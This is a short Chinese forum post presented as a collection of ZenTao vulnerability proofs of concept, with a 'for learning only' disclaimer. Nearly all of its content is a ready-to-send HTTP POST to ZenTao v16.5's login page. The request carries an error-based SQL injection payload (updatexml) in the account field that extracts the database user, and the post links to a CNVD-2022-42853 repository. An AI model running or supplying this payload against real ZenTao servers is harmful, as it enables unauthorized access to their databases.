禅道漏洞 PoC 整理
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!禅道 v16.5 SQL 注入
POST /zentao/user-login.html HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
account=admin%27+and++updatexml%281%2Cconcat%280x1%2Cuser%28%29%29%2C1%29+and+%271%27%3D%271
https://github.com/ce-automne/CNVD-2022-42853
页:
[1]